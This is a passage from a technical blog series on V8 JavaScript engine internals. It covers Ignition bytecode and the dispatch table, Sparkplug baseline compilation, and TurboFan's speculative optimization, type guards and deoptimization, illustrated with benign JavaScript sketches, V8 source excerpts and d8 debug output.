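// Opcode -> [name, total length in bytes], as observed in the listing.
const opcodes = {
  0x13: ['LdaConstant', 2],
  0xc4: ['Star1', 1],
  0x19: ['Mov', 3],
  0x66: ['CallRuntime', 5],
  0x0d: ['LdaSmi', 2],
  0x23: ['StaGlobal', 3],
  0x0e: ['LdaUndefined', 1],
  0xaa: ['Return', 1],
};

// Walk the byte stream: the first byte of each instruction selects the opcode,
// and the opcode tells us how many operand bytes follow.
function decode(stream) {
  const instructions = [];
  let offset = 0;
  while (offset < stream.length) {
    const [name, length] = opcodes[stream[offset]];
    instructions.push({ offset, name, operands: stream.slice(offset + 1, offset + length) });
    offset += length;
  }
  return instructions;
}

for (const { offset, name, operands } of decode(bytes)) {
  console.log(offset, name, operands);
}
```

The offsets this produces (0, 2, 3, 6, 11, 13, 16, 17) line up with the @ column in the d8 output, and the operand of LdaSmi is 0x2a, which is our 42.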

Once that’s received, SetBytecodeHandler() will be called with the bytecode, its operand scale, and its handler. This function is within the v8/src/interpreter/interpreter.cc file; an example of that function is shown below.

void Interpreter::SetBytecodeHandler(Bytecode bytecode,
                                     OperandScale operand_scale,
                                     CodeT handler) {
  DCHECK(handler.is_off_heap_trampoline());
  DCHECK(handler.kind() == CodeKind::BYTECODE_HANDLER);
  size_t index = GetDispatchTableIndex(bytecode, operand_scale);
  dispatch_table_[index] = handler.InstructionStart();
}

size_t Interpreter::GetDispatchTableIndex(Bytecode bytecode,
                                          OperandScale operand_scale) {
  static const size_t kEntriesPerOperandScale = 1u << kBitsPerByte;
  size_t index = static_cast<size_t>(bytecode);
  return index + BytecodeOperands::OperandScaleAsIndex(operand_scale) *
                     kEntriesPerOperandScale;
}

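As you can see, GetDispatchTableIndex() calculates the index of the bytecode within the dispatch table, and dispatch_table_[index] stores the entry address of the bytecode’s handler at that index. A pointer to the dispatch table is kept in a physical register, and the Dispatch() function eventually uses it to jump to the handler that executes the bytecode.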
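The index calculation is easy to reproduce by hand. In the sketch below, the constant names mirror the C++ snippet above, while the OperandScaleIndex mapping (single, double and quadruple operand widths mapping to sections 0, 1 and 2) is my assumption about what OperandScaleAsIndex() returns; the 0x0d value for LdaSmi is taken from the d8 output in this post.

```javascript
const kBitsPerByte = 8;
const kEntriesPerOperandScale = 1 << kBitsPerByte;  // 256 handler slots per operand scale

// Assumed mapping of operand scales to table sections.
const OperandScaleIndex = { single: 0, double: 1, quadruple: 2 };

// Same arithmetic as the C++ GetDispatchTableIndex() shown above.
function getDispatchTableIndex(bytecode, operandScale) {
  return bytecode + OperandScaleIndex[operandScale] * kEntriesPerOperandScale;
}

console.log(getDispatchTableIndex(0x0d, 'single'));     // prints 13
console.log(getDispatchTableIndex(0x0d, 'double'));     // prints 269
console.log(getDispatchTableIndex(0x0d, 'quadruple'));  // prints 525
```

In other words, the table is laid out as consecutive blocks of 256 entries, one block per operand width, and the bytecode value picks the entry within the block.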

The bytecode array also contains something called a “Constant Pool Pointer”, which points to the heap objects that are referenced as constants in generated bytecode, such as strings and integers. The constant pool is a FixedArray of pointers to heap objects. An example of this BytecodeArray pointer and its constant pool of heap objects can be seen below.

One more thing I want to mention before we continue, is that the InterpreterEntryTrampoline stub has some fixed machine registers that are used by Ignition. These registers are located within the v8/src/codegen/x64/register-x64.h file.

A sample of these registers can be seen below, and comments are added to the ones of interest.

// Define {RegisterName} methods for the register types.
DEFINE_REGISTER_NAMES(Register, GENERAL_REGISTERS)
DEFINE_REGISTER_NAMES(XMMRegister, DOUBLE_REGISTERS)
DEFINE_REGISTER_NAMES(YMMRegister, YMM_REGISTERS)

// Give alias names to registers for calling conventions.
constexpr Register kReturnRegister0 = rax;
constexpr Register kReturnRegister1 = rdx;
constexpr Register kReturnRegister2 = r8;
constexpr Register kJSFunctionRegister = rdi;
// Points to the current context object
constexpr Register kContextRegister = rsi;
constexpr Register kAllocateSizeRegister = rdx;
// Stores the implicit accumulator interpreter register
constexpr Register kInterpreterAccumulatorRegister = rax;
// The current offset of execution in the BytecodeArray
constexpr Register kInterpreterBytecodeOffsetRegister = r9;
// Points to the start of the BytecodeArray object which is being interpreted
constexpr Register kInterpreterBytecodeArrayRegister = r12;
// Points to the interpreter’s dispatch table, used to dispatch to the next bytecode handler
constexpr Register kInterpreterDispatchTableRegister = r15;

Now that we understand this, it’s time to dig into what V8 bytecode looks like and how the bytecode operands interact with the register file.

Understanding V8’s Bytecode

As stated in Part 1, there are several hundred bytecodes within V8, and they are all defined within the v8/src/interpreter/bytecodes.h header file. As we’ll see in a minute, each of these bytecodes specifies its input and output operands as registers in the register file. Additionally, many of the opcodes start with Lda or Sta in the name, where the a stands for accumulator.

For example, let’s follow the bytecode definition for LdaSmi:

V(LdaSmi, ImplicitRegisterUse::kWriteAccumulator, OperandType::kImm)

As you can see, LdaSmi will “Load” (hence the Ld) a value into the accumulator register. In this case it will load a kImm operand, which is a signed byte and coincides with the Smi or Small Integer in the bytecode name. In summary, this bytecode will load a small integer into the accumulator register.

Do note that the list of operands and their types is defined within the v8/src/interpreter/bytecode-operands.h header file.

So, with that basic information, let’s take a look at some bytecode of an actual JavaScript function. To start, let’s launch d8 with the --print-bytecode flag so we can see the bytecode. Once that’s done, just enter some random JavaScript code and press enter a few times. The reason for this is that V8 is a “lazy” engine, so it won’t compile stuff it doesn’t need. But because we are using strings and numbers for the first time, it’s going to compile libraries like Stringify, which results in a massive amount of output at first.

Once done, let’s create a simple JavaScript function called incX which will increment an object’s property of x by one, and return it to us. The function should look like so.

function incX(obj) { return 1 + obj.x; }

This will generate some bytecode, but let’s not worry about it. Now that we have that, let’s call that function with an object that has a value assigned to property x, and view the bytecode generated.

d8> incX({x:13});
...
[generated bytecode for function: incX (0x026c0025ab65 <SharedFunctionInfo incX>)]
Bytecode length: 11
Parameter count 2
Register count 1
Frame size 8
Bytecode age: 0
         0000026C0025ACC6 @    0 : 0d 01             LdaSmi [1]
         0000026C0025ACC8 @    2 : c5                Star0
         0000026C0025ACC9 @    3 : 2d 03 00 01       GetNamedProperty a0, [0], [1]
         0000026C0025ACCD @    7 : 39 fa 00          Add r0, [0]
         0000026C0025ACD0 @   10 : aa                Return
Constant pool (size = 1)
0000026C0025AC99: [FixedArray] in OldSpace
 - map: 0x026c00002231 <Map(FIXED_ARRAY_TYPE)>
 - length: 1
           0: 0x026c000041ed <String[1]: #x>
Handler Table (size = 0)
Source Position Table (size = 0)
14

We’ll ignore most of the output and just focus on the bytecode section. But before we do, take note that this bytecode is in the SharedFunctionInfo object, which coincides with our explanation before! To start we see that LdaSmi is called to load a small integer into the accumulator register, which will be a value of 1.

Next, we call Star0 which will store (hence the st) the value in the accumulator (as per the a) in register r0. So in this case we move 1 to r0.

The GetNamedProperty bytecode gets a named property from a0 and stores it in the accumulator, which will be the value of 13. The a0 refers to the i-th argument of the function, counting from zero. So if we passed in a, b, x, and we wanted to load x, the bytecode operand would state a2, as x is the third argument within the function (remember, this is an array of arguments). In this case, the [0] operand is an index into the constant pool, where index 0 maps to x.

 - length: 1
           0: 0x026c000041ed <String[1]: #x>

In short, this is the bytecode that loads obj.x. The last operand, [1], is an index into the function’s feedback vector, which contains runtime information and object shape data that is used for optimization by TurboFan.

Next, we Add the value in register r0 to the accumulator, resulting in the value of 14. Finally, we call Return which returns the value of the accumulator, and we exit the function.
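If you prefer to read this as code, the five bytecodes can be replayed by hand in plain JavaScript. This is just a sketch of the walkthrough above, with the accumulator and r0 modelled as ordinary variables; the runIncX and record names are mine, and the feedback slot operands are ignored since they don’t affect the result.

```javascript
// Replay the incX bytecode step by step, tracking the accumulator and register r0.
function runIncX(obj) {
  const constantPool = ['x'];     // matches the constant pool in the dump: index 0 is "x"
  const args = [obj];             // a0 is the first argument
  const registers = [undefined];  // "Register count 1" means there is only r0
  let accumulator;
  const trace = [];
  const record = (bytecode) => trace.push({ bytecode, accumulator, r0: registers[0] });

  accumulator = 1;                           // LdaSmi [1]
  record('LdaSmi [1]');

  registers[0] = accumulator;                // Star0
  record('Star0');

  accumulator = args[0][constantPool[0]];    // GetNamedProperty a0, [0], [1]
  record('GetNamedProperty a0, [0], [1]');

  accumulator = registers[0] + accumulator;  // Add r0, [0]
  record('Add r0, [0]');

  record('Return');                          // Return hands back the accumulator
  return { result: accumulator, trace };
}

const { result, trace } = runIncX({ x: 13 });
for (const step of trace) {
  console.log(step.bytecode, '| acc =', step.accumulator, '| r0 =', step.r0);
}
console.log(result);  // prints 14
```

Each line of the trace shows the state after that bytecode has run, so you can follow the 1 moving into r0, the 13 arriving in the accumulator, and the final 14.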

In order to help you visualize this on the stack frame, I have provided a GIF of what happens on a simplified stack with each bytecode instruction.

As you can see, while the bytecodes are a little cryptic, once we get the hang of what each one does, it’s pretty easy to understand and follow along. If you want to learn more about V8’s bytecode, I suggest reading “JavaScript Bytecode – v8 Ignition Instructions” which covers a good chunk of different operations.

Sparkplug

Now that we have a decent understanding of how Ignition generates and executes your JavaScript code as bytecode, it’s time we start looking into V8’s compilation portion of the compiler pipeline. We’ll start with Sparkplug because it’s rather easy to understand as it only does a small modification to the already generated bytecode and stack for optimization purposes.

As we know from Part 1, Sparkplug is V8’s very fast non-optimizing compiler which sits in between Ignition and TurboFan. In essence, Sparkplug isn’t really a compiler but more of a transpiler which converts Ignition’s bytecode into machine code to run it natively. Also, since it’s a non-optimizing compiler, it doesn’t perform any heavy optimizations; that is TurboFan’s job.

So, what makes Sparkplug so fast? Well, Sparkplug is fast because it cheats. The functions that it compiles have already been compiled down to bytecode, and as we know, Ignition has already done the hard work of variable resolution, control flow, etc. In this case, Sparkplug compiles from the bytecode rather than from JavaScript source.

Second of all, Sparkplug doesn’t produce any intermediate representation (IR) like most compilers do (which we’ll learn about later). In this case, Sparkplug compiles directly to machine code in a single linear pass over the bytecode. This in general is known as 1:1 mapping.

The funny thing is that Sparkplug is pretty much just a switch statement inside a for loop, which dispatches on each bytecode to a fixed, per-bytecode function that generates the machine code. We can see this implementation within the v8/src/baseline/baseline-compiler.cc source file.

An example of Sparkplug’s machine code generation function can be seen below.

switch (iterator().current_bytecode()) {
#define BYTECODE_CASE(name, ...)       \
  case interpreter::Bytecode::k##name: \
    Visit##name();                     \
    break;
    BYTECODE_LIST(BYTECODE_CASE)
#undef BYTECODE_CASE
  }

So how does Sparkplug generate this machine code? Well, it does so by cheating again, of course. Sparkplug generates very little code of its own. Instead, it just calls the bytecode builtins that are usually entered by the InterpreterEntryTrampoline and then handled within v8/src/builtins/x64/builtins-x64.cc.

If you remember back to our JSFunction object during our talk about Ignition, you’ll remember that the closure linked to “optimized code”. In essence, Sparkplug will store the bytecode’s builtin there, and when the function gets executed, instead of dispatching to the bytecode, we call the builtin directly.

At this point you might be thinking that Sparkplug is essentially a glorified interpreter, and you wouldn’t be wrong. Sparkplug pretty much just serializes the interpreter’s execution by calling the same builtins. But this allows for the JavaScript function to be faster, because by doing this we can avoid the interpreter overheads like opcode decoding and bytecode dispatching lookups - allowing us to scale back CPU usage by moving from an emulation engine to native execution.
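To illustrate the "switch inside a for loop" design and the idea of calling builtins directly, here is a toy baseline compiler in JavaScript. Everything in it is hypothetical: the builtins object, the frame shape and the compileBaseline function are stand-ins I made up, and where Sparkplug would emit machine code, the sketch emits a flat list of closures that call the same builtins an interpreter would use.

```javascript
// Shared "builtins": one function per bytecode, all working on the same frame layout.
const builtins = {
  LdaSmi: (frame, value) => { frame.accumulator = value; },
  Star: (frame, reg) => { frame.registers[reg] = frame.accumulator; },
  GetNamedProperty: (frame, argIndex, name) => {
    frame.accumulator = frame.args[argIndex][name];
  },
  Add: (frame, reg) => { frame.accumulator = frame.registers[reg] + frame.accumulator; },
};

// Baseline "compiler": one linear pass over the bytecode, no intermediate representation.
function compileBaseline(bytecode) {
  const code = [];
  for (const [name, ...operands] of bytecode) {
    switch (name) {
      case 'LdaSmi':
      case 'Star':
      case 'GetNamedProperty':
      case 'Add':
        // Operands are resolved now, at compile time, not on every execution.
        code.push((frame) => builtins[name](frame, ...operands));
        break;
      case 'Return':
        code.push((frame) => { frame.done = true; });
        break;
      default:
        throw new Error('unsupported bytecode: ' + name);
    }
  }
  // The compiled function runs the calls back to back; no opcode decoding at run time.
  return function compiled(...args) {
    const frame = { accumulator: undefined, registers: [], args, done: false };
    for (const call of code) {
      call(frame);
      if (frame.done) break;
    }
    return frame.accumulator;
  };
}

const incXBytecode = [
  ['LdaSmi', 1],
  ['Star', 0],
  ['GetNamedProperty', 0, 'x'],
  ['Add', 0],
  ['Return'],
];
const incX = compileBaseline(incXBytecode);
console.log(incX({ x: 13 }));  // prints 14
```

The decoding of names and operands happens once, inside compileBaseline, and the result can then be called as many times as we like, which is the same trade that lets Sparkplug skip the interpreter’s per-instruction overhead.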

To learn a little bit more about how these builtins work, I suggest reading “Short Builtin Calls”.

1:1 Mapping

Sparkplug’s 1:1 mapping doesn’t just relate to how it compiles Ignition’s bytecode down to its machine code variant; it also applies to stack frames. As we know, each portion of the compiler pipeline needs to store function state. And as we’ve seen already in V8, JavaScript function states are stored in Ignition’s stack frames by storing the current function being called, the context it is being called with, the number of arguments that were passed, a pointer to the bytecode array, and so on.

Now, as we know, Ignition is a register-based interpreter which has virtual registers that are used for function arguments and as inputs and outputs for bytecode operands. For Sparkplug to be fast and to avoid having to do any register allocation of its own, it reuses Ignition’s register frames, which in turn allows Sparkplug to mirror the interpreter’s behavior and stack as well. This means Sparkplug doesn’t need any sort of mapping between the two frames - making these stack frames almost 1:1 compatible.

Do note that I say “almost 1:1 compatible”, because there is one small difference between the Ignition and Sparkplug stack frames: Sparkplug doesn’t need to keep the bytecode offset slot in the register file, since Sparkplug code is emitted directly from the bytecode. Instead, it replaces that slot with the cached feedback vector.

An example of how these two stack frames compare can be seen in the image below - as provided by the Ignition Documentation.

So why does Sparkplug need to create and maintain a stack frame layout that’s similar to Ignition’s? The main reason, and a key part of how Sparkplug and TurboFan work, is something called on-stack replacement (OSR). OSR is the ability to replace currently executing code with a different version. In this case, when Ignition sees that a JavaScript function is used a lot, it will send it to Sparkplug to speed it up.

Once Sparkplug serializes the bytecodes to their builtins, it will replace the interpreter’s stack frame for that specific function. When the stack is walked and executed, the code will jump directly into Sparkplug instead of being executed on Ignition’s emulated stack. And since the frames are “mirrored”, this technically allows V8 to swap between the interpreter and Sparkplug code with almost zero frame translation overhead.

Before we move on, I just want to point out the security aspect of Sparkplug. In general, there is unlikely to be a security issue in the generated code itself. The bigger security risk with Sparkplug is with how the layout of Ignition’s stack frames is interpreted, which can lead to a type confusion or code execution on the stack.

One example of this would be Issue 1179595, which was a potential RCE due to an invalid register count check. There is also a concern in the way Sparkplug does RX/WX bit flipping - but I won’t go into detail, as such bugs don’t play an important role in this overall series.

Okay, so we understand how Ignition and Sparkplug work. Now, it’s time to dive deeper into the compiler pipeline and into understanding the optimizing compiler, TurboFan.

TurboFan

TurboFan is V8’s Just-In-Time (JIT) compiler that combines an interesting intermediate representation concept known as the “Sea of Nodes” with a multi-layered translation and optimization pipeline that helps TurboFan generate better quality machine code from bytecode. Those who have been reading the code and documentation along the way will know that TurboFan is much more than just a compiler.

TurboFan is actually responsible for the interpreter’s bytecode handlers, builtins, code stubs, and inline cache system via its macro assembler! So when I say that TurboFan is the most important part of the compiler pipeline, I’m not kidding.

So, how do optimizing compilers like TurboFan work?

Well, optimizing compilers work via something called a “profiler” - which we briefly mentioned in Part 1. In essence, this profiler works ahead of time by watching for code that should be optimized (we refer to this code or JavaScript function as being “hot”). It does this by collecting metadata and “samples” from JavaScript functions and the stack by looking at the information collected by inline caches and the feedback vector.

The compiler then builds an intermediate representation (IR) data structure which is used to produce optimized code. This whole process of watching the code and then compiling machine code is called Just-in-Time or JIT compilation.

Just-In-Time Compilation (JIT)

As we know, the execution of bytecode in the interpreter VM is slower than assembly execution on the native machine. The reason for this is that JavaScript is dynamic and there is a lot of overhead for property lookups, checking of objects, values, etc., and we’re also running on an emulated stack.

Of course, Maps and Inline Caching (IC) help solve some of these overheads by speeding up dynamic lookup of properties, objects, and values - but they still can’t deliver peak performance. The reason is that each IC acts on its own, and it has no knowledge or concept about its neighbors.

Take Maps for example: if we add a property to a known shape, we still have to follow the transitions table and look up or add additional shapes. If we have to do this over and over again for a specific function or object, even with a known shape, we’re pretty much wasting computational cycles.

So, when there is a JavaScript function that is executed a lot of times, it might be worth spending the time to pass the function into the compiler and compile it down to machine code, allowing it to be executed much faster.

For example, let’s take this code:

function hot_function(obj) {
	return obj.x;
}

for (let i=0; i < 10000; i++) {
	hot_function({x:i});
}

The hot_function simply takes in an object and returns the value of property x. Next, we execute that function 10k times, and for each object we just pass a new integer for property x. In this case, because the function is used a lot of times and the general shape of the object doesn’t change, V8 might decide that it’s better to just pass it up the pipeline (known as a “tier-up”) for compilation so that it’s executed faster.

We can see this in action within d8 by tracing the optimization with the --trace-opt flag. So, let’s do just that, and also tack on the --allow-natives-syntax flag so we can explore what the function’s code looks like before and after optimization.

We’ll start by launching d8 and then setting up our function. Afterwards, use %DisassembleFunction against hot_function to see its type. You should get something similar to the following.

d8> function hot_function(obj) {return obj.x;}
d8> %DisassembleFunction(hot_function)
0000027B0020B31D: [CodeDataContainer] in OldSpace
 - map: 0x027b00002a71 <Map[32](CODE_DATA_CONTAINER_TYPE)>
 - kind: BUILTIN
 - builtin: InterpreterEntryTrampoline
 - is_off_heap_trampoline: 1
 - code: 0
 - code_entry_point: 00007FFCFF5875C0
 - kind_specific_flags: 0

As you can see, initially this code object will be executed by Ignition since it’s a BUILTIN and will be handled by the InterpreterEntryTrampoline, as we know. Now, if we execute this function 10k times, we will see it get optimized by TurboFan.

d8> for (let i=0; i < 10000; i++) {hot_function({x:i});}
[marking 0x027b0025aa4d <JSFunction (sfi = 0000027B0025A979)> for optimization to TURBOFAN, ConcurrencyMode::kConcurrent, reason: small function]
[compiling method 0x027b0025aa4d <JSFunction (sfi = 0000027B0025A979)> (target TURBOFAN) OSR, mode: ConcurrencyMode::kConcurrent]
[completed compiling 0x027b0025aa4d <JSFunction (sfi = 0000027B0025A979)> (target TURBOFAN) OSR - took 1.691, 81.595, 2.983 ms]
[completed optimizing 0x027b0025aa4d <JSFunction (sfi = 0000027B0025A979)> (target TURBOFAN) OSR]
9999

As you can see, TurboFan kicks in and starts compiling the function for optimization. Take note of a few key points in the optimization trace. In line one of the trace, we are marking the JSFunction’s SFI, or SharedFunctionInfo, for optimization.

If you remember back to our Ignition deep dive, you’ll remember that the SFI contains the bytecode for our function. TurboFan will use that bytecode to generate IR and then optimize it down to machine code.

Now, if you look further down, you’ll see a mention of OSR, or on-stack replacement. TurboFan pretty much does the same thing Sparkplug does when it optimizes bytecode. It will replace the stack frame with a real JIT or system stack frame that will point to the optimized code during runtime. This allows the function to go directly to the optimized code the next time it is called, versus being executed within Ignition’s emulated stack.

If we run %DisassembleFunction against our hot_function again, we should see that it is now optimized and the code entry point in the SharedFunctionInfo will point to optimized machine code.

d8> %DisassembleFunction(hot_function)
0000027B0025B2B5: [CodeDataContainer] in OldSpace
 - map: 0x027b00002a71 <Map[32](CODE_DATA_CONTAINER_TYPE)>
 - kind: TURBOFAN
 - is_off_heap_trampoline: 0
 - code: 0x7ffce0004241 <Code TURBOFAN>
 - code_entry_point: 00007FFCE0004280
 - kind_specific_flags: 4

To those with a keen eye, you might have noticed something interesting when we traced the optimization of our function: TurboFan didn’t kick in right away, but after a few seconds - or after a few thousand iterations of the loop. Why is that?

The reason this happens is that TurboFan waits for the code to “warm up”. If you remember back to our discussion about Ignition and Sparkplug, we briefly mentioned the feedback vector. This vector stores the object runtime data along with information from the inline caches and collects what is known as type feedback.

This is critical for TurboFan because, as we know, JavaScript is dynamic and there is no way for us to store static type information. On top of that, we don’t know the type of a value until runtime. The JIT compiler actually has to make educated guesses about the usage and behavior of the code it’s compiling, such as what your function type is, the types of the variables that are being passed in, etc. In essence, the compiler makes a lot of assumptions or “speculations”.

This is why optimizing compilers look at the information collected by inline caches and use the feedback vector to help make informed decisions on what they need to do with the code to make it fast. This is known as Speculative Optimization.
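The “warm up” idea can be sketched in a few lines of plain JavaScript. Note that this is only a toy model: makeProfiled, TIER_UP_THRESHOLD, and the fields of the feedback object are names I made up for illustration, and V8’s real tiering heuristics are far more involved than a single counter.

```javascript
// Toy model: the threshold and field names are invented for illustration.
const TIER_UP_THRESHOLD = 1000;

function makeProfiled(fn) {
  const feedback = { invocationCount: 0, seenTypes: new Set(), hot: false };
  function profiled(arg) {
    feedback.invocationCount++;
    feedback.seenTypes.add(typeof arg); // stand-in for type feedback
    if (!feedback.hot && feedback.invocationCount >= TIER_UP_THRESHOLD) {
      // A real engine would queue an optimizing compile at this point.
      feedback.hot = true;
    }
    return fn(arg);
  }
  profiled.feedback = feedback;
  return profiled;
}

const hotFunction = makeProfiled((obj) => obj.x);
for (let i = 0; i < 10000; i++) {
  hotFunction({ x: i });
}
console.log(hotFunction.feedback.hot, [...hotFunction.feedback.seenTypes]);
```

The function only becomes “hot” after enough calls, and by then the profile already holds the types it was called with, which is exactly the information a speculative optimizer wants.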

Speculative Optimization and Type Guards

So how does speculative optimization help us turn our JavaScript code into highly optimized machine code? Well, to help explain that, let’s start with an example.

Let’s say we have a simple evaluation for a function called add, such as return 1 + i. Here we are returning a value by adding 1 to i. Without knowing what type i is, we need to follow the ECMAScript standard implementation for the runtime semantic of EvaluateStringOrNumericBinaryExpression.

As you can see, once we evaluate the left and right references, and call GetValue on both the left and right values of our operand, we then need to follow the ECMAScript standard to ApplyStringOrNumericBinaryOperator so we can return our value.

If it’s not already obvious to you, without knowing what type the variable i is, be it an integer or string, there is no way we can implement this whole evaluation in just a few machine instructions, let alone have it be fast.

This is where the speculative optimization comes in, where TurboFan will rely on the feedback vector to make its assumptions about the possible types that i is.

For example, if after a few hundred runs we look at the feedback vector for the Add bytecode and know that i is a number, then we don’t have to handle the ToString or even the ToPrimitive evaluations. In that case, the optimizer can take an IR instruction and claim that i and the return value are just numbers and load them as such, which minimizes the number of machine instructions we need to generate.
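To show what is being saved, here is a rough JavaScript sketch contrasting a generic addition with a number-only one. The genericAdd function is a heavily simplified stand-in for the spec algorithm (it ignores BigInt, Symbol.toPrimitive, and more), and both function names are hypothetical.

```javascript
// Simplified model of the generic `+` semantics; not the full spec algorithm.
function genericAdd(left, right) {
  const toPrimitive = (v) =>
    (v !== null && typeof v === "object") ? v.valueOf() : v;
  const l = toPrimitive(left);
  const r = toPrimitive(right);
  if (typeof l === "string" || typeof r === "string") {
    return String(l) + String(r); // string concatenation path
  }
  return Number(l) + Number(r); // numeric path
}

// What speculation buys: if feedback says both inputs are always numbers,
// none of the checks above are needed.
function numberAdd(left, right) {
  return left + right;
}

console.log(genericAdd(1, 2), genericAdd(1, "string"), numberAdd(1, 2));
```

Every branch in genericAdd is work the optimized code gets to skip, as long as the speculation about the input types holds.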

So what do these feedback vectors look like in the case of our function?

Well, if you remember back to the mention of the JSFunction object or closure, you’ll remember that the closure linked us to the feedback vector slot as well as the SharedFunctionInfo. Within the feedback vector, there is an interesting slot called the BinaryOp slot, which records feedback about the inputs and outputs of binary operations such as +, -, *, etc.

We can check what’s inside our feedback vector and see this specific slot by running %DebugPrint against our add function. Your output should be similar to mine.

d8> function add(i) {return 1 + i;}
d8> for (let i=0; i<100; i++) {add(i);}
d8> %DebugPrint(add)
DebugPrint: 0000019A002596F1: [Function] in OldSpace
 - map: 0x019a00243fa1 <Map[32](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x019a00243ec9 <JSFunction (sfi = 0000019A0020AA45)>
 - elements: 0x019a00002259 <FixedArray[0]> [HOLEY_ELEMENTS]
 - function prototype:
 - initial_map:
 - shared_info: 0x019a0025962d <SharedFunctionInfo add>
 - name: 0x019a00005809 <String[3]: #add>
 - builtin: InterpreterEntryTrampoline
 - formal_parameter_count: 1
 - kind: NormalFunction
 - context: 0x019a00243881 <NativeContext[273]>
 - code: 0x019a0020b31d <CodeDataContainer BUILTIN InterpreterEntryTrampoline>
 - interpreted
 - bytecode: 0x019a0025a89d <BytecodeArray[9]>
 - source code: (i) {return 1 + i;}
 - properties: 0x019a00002259 <FixedArray[0]>
   ...
 - feedback vector: 0000019A0025B759: [FeedbackVector] in OldSpace
 - map: 0x019a0000273d <Map(FEEDBACK_VECTOR_TYPE)>
 - length: 1
 - shared function info: 0x019a0025962d <SharedFunctionInfo add>
 - no optimized code
 - tiering state: TieringState::kNone
 - maybe has maglev code: 0
 - maybe has turbofan code: 0
 - invocation count: 97
 - profiler ticks: 0
 - closure feedback cell array: 0000019A00003511: [ClosureFeedbackCellArray] in ReadOnlySpace
 - map: 0x019a00002981 <Map(CLOSURE_FEEDBACK_CELL_ARRAY_TYPE)>
 - length: 0

 - slot #0 BinaryOp BinaryOp:SignedSmall {
     [0]: 1
  }
   ...

There are a few interesting items in here. The invocation count shows us the number of times we ran the add function, and if we look into our feedback vector, we’ll see that we have exactly one slot, which is the BinaryOp that we talked about. Looking into that slot, we see that it contains the current feedback type of SignedSmall, which in essence refers to an SMI.

Remember, this feedback information is not interpreted by V8 but by TurboFan, and as we know, an SMI is a signed 32-bit value, as we explained during the pointer tagging portion in Part 1 of this series.

Overall, these speculations via feedback vectors are great in helping speed up our code by removing unnecessary machine instructions for different types. Unfortunately, it’s pretty unsafe to just apply instructions solely focused around one type to dynamic objects.

So, what happens if halfway during the optimized function we pass in a string instead of a number? In essence, if this were to happen, then we would have a type confusion vulnerability on our hands. To protect against potentially wrong assumptions, TurboFan prepends something known as a type guard before execution of specific instructions.

This type guard checks to make sure that the shape of the object we are passing in is the correct type. This is done before the object reaches our optimized operations. If the object does not match the expected shape, then the execution of the optimized code can’t continue. In that case, we will “bail out” of the assembly code, and jump back to the unoptimized bytecode within the interpreter and continue execution there. This is known as “deoptimization”.

An example of a type guard and jump to deoptimization in the optimized assembly code can be seen below.

REX.W movq rcx,[rbp-0x38]       ; Move i to rcx
testb rcx,0x1                   ; Check if rcx is an SMI
jnz 00007FFB0000422A  <+0x1ea>  ; If check fails, bailout
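The same guard-then-bail-out pattern can be sketched in plain JavaScript. The names addOptimized, addGeneric, and deoptCount are hypothetical, and the int32 test below only approximates V8’s real Smi check, so treat this as a model of the control flow rather than of the actual machine code.

```javascript
let deoptCount = 0;

// Slow path: handles every input type, like the interpreter would.
function addGeneric(i) {
  return 1 + i;
}

// Fast path: only valid while the speculation "i is a small integer" holds.
function addOptimized(i) {
  // Type guard: plays the role of the Smi check in the assembly above.
  if (typeof i !== "number" || (i | 0) !== i) {
    deoptCount++;         // bail out ("deoptimize")
    return addGeneric(i); // and continue on the generic path
  }
  return 1 + i; // speculation held, plain integer addition
}

console.log(addOptimized(41), addOptimized("string"), deoptCount);
```

The important property is that the guard runs before the specialized operation, so a value of the wrong type never reaches code that assumes it is an integer.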

Now, deoptimizations due to type guards aren’t limited to checking for a mismatch in object types. They also work on arithmetic operations and bounds checking.

For example, if our optimized code was optimized for arithmetic operations on 32-bit integers, and there is an overflow, we can deoptimize and let Ignition handle the calculations - thus protecting us from potential security issues on the machine. Such issues that can lead to deoptimization are known as “side-effects” (which we’ll cover in more detail later).
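As a rough illustration of the overflow case, the sketch below models a checked 32-bit addition that signals a bailout instead of producing a wrapped result. The checkedInt32Add helper and its return shape are my own invention for this example.

```javascript
const INT32_MAX = 2 ** 31 - 1;
const INT32_MIN = -(2 ** 31);

// Adds two int32 values; reports a deopt instead of silently overflowing.
function checkedInt32Add(a, b) {
  const sum = a + b; // doubles represent this sum exactly for int32 inputs
  if (sum > INT32_MAX || sum < INT32_MIN) {
    return { deopt: true, value: undefined };
  }
  return { deopt: false, value: sum };
}

console.log(checkedInt32Add(1, 2), checkedInt32Add(INT32_MAX, 1));
```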

As with the optimization process, we can also see deoptimization in action within d8 by utilizing the --trace-deopt flag. Once done, let’s re-add our add function and run the following loop.

for (let i=0; i<10000; i++) {
	if (i<7000) {
		add(i);
	} else {
		add("string");
	}
}

This will simply let the function be optimized for numbers, and then after 7k iterations, we’ll start passing in a string - which should trigger a bailout. Your output should be similar to mine.

d8> function add(i) {return 1 + i;}
d8> for (let i=0; i<10000; i++) {if (i<7000) {add(i);} else {add("string");}}
[marking 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> for optimization to TURBOFAN, ConcurrencyMode::kConcurrent, reason: small function]
[compiling method 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> (target TURBOFAN) OSR, mode: ConcurrencyMode::kConcurrent]
[completed compiling 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> (target TURBOFAN) OSR - took 1.987, 70.704, 2.731 ms]
[completed optimizing 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> (target TURBOFAN) OSR]
[bailout (kind: deopt-eager, reason: Insufficient type feedback for call): begin. deoptimizing 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)>, 0x7ffb00004001 <Code TURBOFAN>, opt id 0, node id 63, bytecode offset 40, deopt exit 3, FP to SP delta 96, caller SP 0x00ea459fe250, pc 0x7ffb00004274]
[compiling method 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> (target TURBOFAN) OSR, mode: ConcurrencyMode::kConcurrent]
[completed compiling 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> (target TURBOFAN) OSR - took 0.325, 121.591, 1.425 ms]
[completed optimizing 0x03e20025ac55 <JSFunction (sfi = 000003E20025AB5D)> (target TURBOFAN) OSR]
"1string"

As you can see, the function gets optimized, and later we trigger a bailout. This deoptimizes the code back to bytecode due to insufficient type feedback during our call. Then, something interesting happens. The function gets optimized again. Why?

